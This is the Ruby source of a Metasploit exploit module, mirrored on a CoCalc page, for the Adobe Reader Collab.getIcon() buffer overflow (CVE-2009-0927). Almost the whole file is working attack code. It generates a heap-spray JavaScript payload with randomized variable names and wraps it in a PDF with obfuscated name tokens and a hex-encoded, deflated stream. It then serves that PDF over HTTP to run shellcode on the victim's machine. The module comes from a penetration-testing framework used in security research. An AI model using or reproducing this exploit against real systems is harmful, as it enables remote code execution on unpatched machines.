Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/adobe_geticon.rb
19664 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'zlib'

7


8
class MetasploitModule < Msf::Exploit::Remote

9
  Rank = GoodRanking

10


11
  include Msf::Exploit::Remote::HttpServer::HTML

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'Adobe Collab.getIcon() Buffer Overflow',

18
        'Description' => %q{

19
          This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat.

20
          Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially

21
          crafted pdf that a contains malformed Collab.getIcon() call, an attacker may

22
          be able to execute arbitrary code.

23
        },

24
        'License' => MSF_LICENSE,

25
        'Author' => [

26
          'MC',

27
          'Didier Stevens <didier.stevens[at]gmail.com>',

28
          'jduck'

29
        ],

30
        'References' => [

31
          [ 'CVE', '2009-0927' ],

32
          [ 'OSVDB', '53647' ],

33
          [ 'ZDI', '09-014' ],

34
          [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb09-04.html']

35
        ],

36
        'DefaultOptions' => {

37
          'EXITFUNC' => 'process',

38
        },

39
        'Payload' => {

40
          'Space' => 1024,

41
          'BadChars' => "\x00",

42
        },

43
        'Platform' => 'win',

44
        'Targets' => [

45
          # test results (on Windows XP SP3)

46
          # reader 7.0.5 - no trigger

47
          # reader 7.0.8 - no trigger

48
          # reader 7.0.9 - no trigger

49
          # reader 7.1.0 - no trigger

50
          # reader 7.1.1 - reported not vulnerable

51
          # reader 8.0.0 - works

52
          # reader 8.1.2 - works

53
          # reader 8.1.3 - reported not vulnerable

54
          # reader 9.0.0 - works

55
          # reader 9.1.0 - reported not vulnerable

56
          [ 'Adobe Reader Universal (JS Heap Spray)', { 'Ret' => '' } ],

57
        ],

58
        'DisclosureDate' => '2009-03-24',

59
        'DefaultTarget' => 0,

60
        'Notes' => {

61
          'Reliability' => UNKNOWN_RELIABILITY,

62
          'Stability' => UNKNOWN_STABILITY,

63
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

64
        }

65
      )

66
    )

67
  end

68


69
  def autofilter

70
    false

71
  end

72


73
  def check_dependencies

74
    use_zlib

75
  end

76


77
  def on_request_uri(cli, request)

78
    return if ((p = regenerate_payload(cli)) == nil)

79


80
    # Encode the shellcode.

81
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

82


83
    # Make some nops

84
    nops = Rex::Text.to_unescape(make_nops(4))

85


86
    # Randomize variables

87
    rand1 = rand_text_alpha(rand(100) + 1)

88
    rand2 = rand_text_alpha(rand(100) + 1)

89
    rand3 = rand_text_alpha(rand(100) + 1)

90
    rand4 = rand_text_alpha(rand(100) + 1)

91
    rand5 = rand_text_alpha(rand(100) + 1)

92
    rand6 = rand_text_alpha(rand(100) + 1)

93
    rand7 = rand_text_alpha(rand(100) + 1)

94
    rand8 = rand_text_alpha(rand(100) + 1)

95
    rand9 = rand_text_alpha(rand(100) + 1)

96
    rand10 = rand_text_alpha(rand(100) + 1)

97
    rand11 = rand_text_alpha(rand(100) + 1)

98
    rand12 = rand_text_alpha(rand(100) + 1)

99
    randnop = rand_text_alpha(rand(100) + 1)

100


101
    script = %Q|

102
    var #{rand1} = unescape("#{shellcode}");

103
    var #{rand2} ="";

104
    var #{randnop} = "#{nops}";

105
    for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape("#{randnop}");

106
    #{rand4} = #{rand2} + #{rand1};

107
    #{rand5} = unescape(#{randnop});

108
    #{rand6} = 20;

109
    #{rand7} = #{rand6}+#{rand4}.length

110
    while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};

111
    #{rand8} = #{rand5}.substring(0, #{rand7});

112
    #{rand9} = #{rand5}.substring(0, #{rand5}.length-#{rand7});

113
    while(#{rand9}.length+#{rand7} < 0x40000) #{rand9} = #{rand9}+#{rand9}+#{rand8};

114
    #{rand10} = new Array();

115
    for (#{rand11}=0;#{rand11}<1450;#{rand11}++) #{rand10}[#{rand11}] = #{rand9} + #{rand4};

116
    var #{rand12} = unescape("%0a");

117
    while(#{rand12}.length < 0x4000) #{rand12}+=#{rand12};

118
    #{rand12} = "N."+#{rand12};

119
    Collab.getIcon(#{rand12});

120
          |

121


122
    # Create the pdf

123
    pdf = make_pdf(script)

124


125
    print_status("Sending #{self.name}")

126


127
    send_response(cli, pdf, { 'Content-Type' => 'application/pdf' })

128


129
    handler(cli)

130
  end

131


132
  def random_non_ascii_string(count)

133
    result = ""

134
    count.times do

135
      result << (rand(128) + 128).chr

136
    end

137
    result

138
  end

139


140
  def io_def(id)

141
    "%d 0 obj" % id

142
  end

143


144
  def io_ref(id)

145
    "%d 0 R" % id

146
  end

147


148
  # http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/

149
  def n_obfu(str)

150
    result = ""

151
    str.scan(/./u) do |c|

152
      if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'

153
        result << "#%x" % c.unpack("C*")[0]

154
      else

155
        result << c

156
      end

157
    end

158
    result

159
  end

160


161
  def ascii_hex_whitespace_encode(str)

162
    result = ""

163
    whitespace = ""

164
    str.each_byte do |b|

165
      result << whitespace << "%02x" % b

166
      whitespace = " " * (rand(3) + 1)

167
    end

168
    result << ">"

169
  end

170


171
  def make_pdf(js)

172
    xref = []

173
    eol = "\x0d\x0a"

174
    endobj = "endobj" << eol

175


176
    pdf = "%PDF-1.5" << eol

177
    pdf << "%" << random_non_ascii_string(4) << eol

178
    xref << pdf.length

179
    pdf << io_def(1) << n_obfu("<</Type/Catalog/Outlines ") << io_ref(2) << n_obfu("/Pages ") << io_ref(3) << n_obfu("/OpenAction ") << io_ref(5) << ">>" << endobj

180
    xref << pdf.length

181
    pdf << io_def(2) << n_obfu("<</Type/Outlines/Count 0>>") << endobj

182
    xref << pdf.length

183
    pdf << io_def(3) << n_obfu("<</Type/Pages/Kids[") << io_ref(4) << n_obfu("]/Count 1>>") << endobj

184
    xref << pdf.length

185
    pdf << io_def(4) << n_obfu("<</Type/Page/Parent ") << io_ref(3) << n_obfu("/MediaBox[0 0 612 792]>>") << endobj

186
    xref << pdf.length

187
    pdf << io_def(5) << n_obfu("<</Type/Action/S/JavaScript/JS ") + io_ref(6) + ">>" << endobj

188
    xref << pdf.length

189
    compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))

190
    pdf << io_def(6) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol

191
    pdf << "stream" << eol

192
    pdf << compressed << eol

193
    pdf << "endstream" << eol

194
    pdf << endobj

195
    xrefPosition = pdf.length

196
    pdf << "xref" << eol

197
    pdf << "0 %d" % (xref.length + 1) << eol

198
    pdf << "0000000000 65535 f" << eol

199
    xref.each do |index|

200
      pdf << "%010d 00000 n" % index << eol

201
    end

202
    pdf << "trailer" << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol

203
    pdf << "startxref" << eol

204
    pdf << xrefPosition.to_s() << eol

205
    pdf << "%%EOF" << eol

206
  end

207
end

208


209